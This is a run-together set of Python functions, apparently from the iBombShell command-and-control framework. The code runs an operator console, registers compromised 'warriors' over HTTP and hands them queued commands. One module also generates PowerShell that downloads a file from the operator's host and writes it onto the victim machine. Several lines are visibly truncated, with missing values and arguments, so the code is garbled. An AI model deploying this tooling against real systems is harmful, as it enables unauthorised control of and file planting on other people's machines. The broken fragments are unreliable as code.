def console(self): # commands & functions self.switcher = { "load": self.load, "set": self.set, "unset": self.unset, "global": self.setglobal, "show":, "run":, "back": self.back, "warrior": self.warrior, "quit": self.quit, "help":, } # Configuring the commpleter self.comp = Completer([ 'load', 'set', 'unset', 'global', 'show', 'run', 'back', 'warrior', 'quit', 'help' ]) readline.set_completer_delims(' \t\n;') readline.parse_and_bind("tab: complete") readline.set_completer(self.comp.complete) print(banners.get_banner()) cprint(' [+]', 'yellow', end='') print(' Starting the console...') cprint(' [*]', 'green', end='') print(' Console ready!\n') self.session = None while True: try: if self.session is None: # /* Definitions available for use by readline clients. */ # define RL_PROMPT_START_IGNORE '\001' # define RL_PROMPT_END_IGNORE '\002' user_input = input( '\001\033[1;32m\002iBombShell> \001\033[0m\002').strip( ) else: user_input = input('iBombShell[' + '\001\033[1;32m\002' + self.session.header() + '\001\033[0m\002' + ']> ').strip() if user_input == "": continue else: self.switch(user_input) except KeyboardInterrupt: signal.signal(signal.SIGINT, self.keyboard_interrupt_handler) print("") Warrior.get_instance().kill_warriors() except Exception as e: print_error(e)
def do_GET(self): warrior_path = Config.get_instance().get_warrior_path() + "ibs-" regex = re.findall(r'^(.+)/([^/]+)$', self.path) route = '' try: route = regex[0][0].strip('/') route_id = regex[0][1] except Exception: print_error('Error creating warrior...') a = '' if route == "ibombshell": try: with open('{}{}'.format(warrior_path, route_id), 'r') as f: a = if a is not '': print("") print_ok('Warrior {} get iBombShell commands...'.format( route_id)) with open('{}{}'.format(warrior_path, route_id), 'w') as f: f.write('') else: Warrior.get_instance().review_status(route_id) except Exception: print_error('Warrior {} don\'t found'.format(route_id), start="\n") self._set_response() #self.wfile.write("GET request for {}".format(self.path).encode('utf-8')) self.wfile.write(a.encode('utf-8'))
def setglobal(self, user_input=[]): self._check_set(user_input) try: value = ' '.join([str(x) for x in user_input[1:]]) self.session.set(user_input[0], value) Global.get_instance().add_value(user_input[0], value) except: print_error("Option not found for your configuration, use show")
def instantiate_module(self, path): try: print_ok('Loading module...') m = importlib.import_module(path) print_ok('Module loaded!') return m.CustomModule() except ImportError as error: m = 'Error importing the module: ' + str(error) print_error(m) return None
def load(self, user_input=None): if not user_input: self._raise_exception_specify("module") self.session = Session(user_input[0]) # The module is incorrect if not (self.session.correct_module()): print_error('Invalid module') self.session = None else: self.comp.set_commands_to_set(self.session.get_options_name())
def run(self): if not(self._module.check_arguments()): raise Exception('REQUIRED ARGUMENTS NOT SET...exiting') print_ok('Running module...') try: self._module.run_module() except KeyboardInterrupt: print_error('Exiting the module...' ) except Exception as error: m = 'Error running the module: ' + str(error) print_error(m) print_ok('Module exited')
def switch(self, u_input): try: if u_input.startswith("#"): self.execute_command(u_input[1:]) else: u_input = u_input.split() if len(u_input) >= 2: self.switcher.get(u_input[0], self._command_error)(u_input[1:]) else: self.switcher.get(u_input[0], self._command_error)() except Exception as e: print_error(e)
def rename_warrior(self, warrior): if not self.exist_warrior(warrior): raise Exception("Warrior {} doesn't exist".format(warrior)) path_to_rename = self.get_warrior_path(warrior) if path_to_rename: new_name = "" while not new_name: new_name = input("Write the new name: ") if self.exist_warrior(new_name): print_error("There's already a warrior with that name.") new_name = "" with open(path_to_rename, 'a') as f: f.write("""$id = '{}' return 'I have been renamed to {}'""".format( new_name, new_name)) print_info("Renaming ... ") sleep(5) w = self.warriors[warrior] self.warriors[new_name] = w self.remove_warrior(warrior) new_path = path_to_rename.split("ibs-")[0] + "ibs-" + new_name open(new_path, "w")
def do_POST(self): global FILE_SENDED, FILE_SENDED_ERROR content_length = int(self.headers['Content-Length']) post_data = self._set_response() self.wfile.write(''.encode('utf-8')) try: post_data = post_data.decode() fields = parse_qs(post_data) results = fields['results'][0] recv = str(unquote(results)) # normally a base64 string if recv == 'Received': FILE_SENDED = True elif recv == 'Error': FILE_SENDED_ERROR = True except: print_error("Error reading results at file upload.") FILE_SENDED_ERROR = True
def run_module(self): global FILE_SENDED, FILE_SENDED_ERROR, FILE function = """function upload { param ( [Parameter(Mandatory)] [string] $sourceUri, [Parameter(Mandatory)] [string] $destination ) try { $req = iwr -UseBasicParsing -uri $sourceUri $base64 = $req.Content $bytes = [System.Convert]::FromBase64String($base64) [System.IO.File]::WriteAllBytes($destination, $bytes) $req = iwr -UseBasicParsing -uri $sourceUri -Method POST -Body @{results='Received'} return 'Done' } catch { $req = iwr -UseBasicParsing -uri $sourceUri -Method POST -Body @{results='Error'} return 'An error ocurried' } } """ FILE = self.args["source"] dest = self.args["dest"].replace('/', '\\') if not dest.endswith('\\'): dest += '\\' dest += FILE.split("/")[-1] function += "upload -sourceUri 'http://{}:{}/' -destination '{}'".format( self.args["ip"], self.args["port"], dest) listener = Thread(, name='upload listener', kwargs={ 'address': self.args["interface"], 'port': int(self.args["port"]) }) print_info("Sending file... waiting answer from warrior") listener.start() super(CustomModule, self).run(function) while not FILE_SENDED and not FILE_SENDED_ERROR: pass if FILE_SENDED: print_info('File sended correctly.') elif FILE_SENDED_ERROR: print_error('An error ocurried sending the file.') FILE_SENDED = False FILE_SENDED_ERROR = False FILE = '' sleep(1)
def do_POST(self): warrior_path = Config.get_instance().get_warrior_path() + "ibs-" ip_src = self.client_address[0] regex = re.findall(r'^(.+)/([^/]+)$', self.path) route = '' route_id = '' try: route = regex[0][0].strip('/') route_id = regex[0][1] except Exception: print_error('Error creating warrior...') content_length = int( self.headers['Content-Length']) # <--- Gets the size of data post_data = content_length) # <--- Gets the data itself self._set_response() self.wfile.write(''.encode('utf-8')) try: post_data = post_data.decode() fields = parse_qs(post_data) if not fields: return results = "" results = fields['results'][0] try: url = str(unquote(results)) if route == "newibombshell" and route_id != '': if Warrior.get_instance().exist_warrior(route_id): print_error('Warrior already exists!') return with open('{}{}'.format(warrior_path, route_id), 'w') as f: f.write('') print("") print_ok("New warrior {} from {}".format(route_id, ip_src)) data = json.loads(url) is_admin = data['admin'] != 'no' os_version = data['os_version'].strip('\r\n') os_arch = data['os_arch'].strip('\r\n') Warrior.get_instance().add_warrior(route_id, self.client_address[0], is_admin, os_version, os_arch) Warrior.get_instance().print_warrior(route_id) else: for result in url.split("\\n"): print_info(result) except Exception: if results is not '': print_info(results) else: print_error('Error reading results!') except Exception as e: print_error('Error parsing the result!') print_error(e) enter_input()
def keyboard_interrupt_handler(self, signal, frame): print_error("Closing iBombShell, Wait...")